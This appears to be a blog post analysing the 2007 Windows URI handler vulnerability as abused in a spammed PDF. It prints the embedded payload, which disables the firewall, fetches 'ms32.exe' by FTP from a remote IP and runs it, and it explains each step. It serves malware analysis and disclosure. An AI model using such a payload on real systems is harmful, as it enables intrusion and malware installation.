Windows URI protocol handling vulnerability

This is an interesting vulnerability first got published at the end of July 2007 but really brought to light at the end of October 2007. Spammers exploited this vulnerability by sending a specially crafted URI (Uniform Resource Identifier) containing a “%” character and ending with a certain extension (e.g. “.bat” or “.cmd”).

Internet Explorer 7 on Windows XP or Server 2003 changes the way Windows handles URIs. This change had introduced a flaw that can caused Windows to incorrectly determine the appropriate handler for the protocol specified in a URI.

In other words an input validation error within the handling of URIs with registered URI handlers.
(e.g. “mailto”, “news”, “nntp”, “snews”, “telnet”, and “http”).

Adobe Reader and Firefox were to name a few which was used as an attack vector to exploit this vulnerability.

One such malicious PDF file which was spammed out was called “report.pdf” and was only 3,919 bytes in size. Below is the embedded code located within the PDF file

<</URI(mailto:%/../../../../../../windows/system32/cmd”.exe”” /c /q
\”@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\” \”&\” “con.cmd)/S/URI>>

As we can see how the remote code execution was beautifully crafted.

Here are the steps it takes:

1. netsh firewall set opmode mode=disable
   – disables the windows firewall.
2. echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7
   – creates a script which will be used by ftp, script called here is 7
3. ftp -s:7 -v -A>nul
   – runs the script via ftp which downloads the malware called ms32.exe
4. del /q 7
   – deletes the script
5. start ms32.exe
   – finally executes the malware ms32.exe
6. GAMEOVER 🙂

McAfee AV detects the malware as Exploit-PDF
Sophos AV detects the malware as W32/PDF-URI.L
Symantec AV detects the malware as Bloodhound.Exploit.163

Updates for Adobe and Firefox had been released which mitigated this vulnerability.

Microsoft had finally released an update on the 13th of November updating the shell32.dll library which handles the URIs.

References:

http://secunia.com/advisories/26201/
http://www.kb.cert.org/vuls/id/403150/
http://www.us-cert.gov/cas/techalerts/TA07-297B.html
http://vil.nai.com/vil/content/v_139103.htm
http://www.f-secure.com/v-descs/exploit_w32_pdf-uri_l.shtml
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2007-102318-0451-99&tabid=1
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://www.microsoft.com/technet/security/Bulletin/MS07-061.mspx

Leave a Reply

Your email address will not be published. Required fields are marked *